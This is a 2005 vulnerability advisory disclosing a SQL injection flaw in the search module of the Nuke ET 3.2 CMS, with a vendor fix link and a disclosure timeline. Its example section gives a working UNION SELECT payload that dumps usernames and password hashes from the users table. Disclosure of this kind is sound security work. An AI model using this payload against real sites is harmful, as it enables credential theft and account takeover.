NukeETSQL32.txt

`###############################################  
Nuke ET 'search' module 'query' variable SQL injection  
Vendor url: www.truzone.org  
exploit available:yes vendor notify:yes  
advisore:http://lostmon.blogspot.com/2005/11/  
nuke-et-search-module-query-variable.html  
################################################  
  
Nuke ET have a flaw which can be exploited by malicious people to  
conduct SQL injection attacks.  
  
Input passed to the "query" parameter when performing a search isn't  
properly sanitised before being used in a SQL query. This can be  
exploited to manipulate SQL queries by injecting arbitrary SQL code.  
  
#################  
versions:  
################  
  
Nuke ET 3.2  
posible prior versions are afected.  
  
##################  
solution:  
###################  
  
the vendor has release a fix  
  
http://www.truzone.org/modules.php?name=DescNuke&d_op=getit&lid=1557  
  
aply the fix as fast posible  
  
####################  
Timeline  
####################  
  
discovered:21-11-2005  
vendor notify:21-11-2005  
vendor response:21-11-2005  
vendor fix:21-11-2005  
disclosure:21-11-2005  
  
###################  
example:  
###################  
  
go to  
http://[Victim]/modules.php?name=Search  
  
and write in the search box this proof  
  
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*  
  
all users hashes are available to view..  
  
#################### €nd ########################  
  
Thnx to estrella to be my ligth  
Thnx to Truzone  
Thnx to RiXi  
--  
atentamente:  
Lostmon ([email protected])  
Web-Blog: http://lostmon.blogspot.com/  
--  
La curiosidad es lo que hace mover la mente....  
`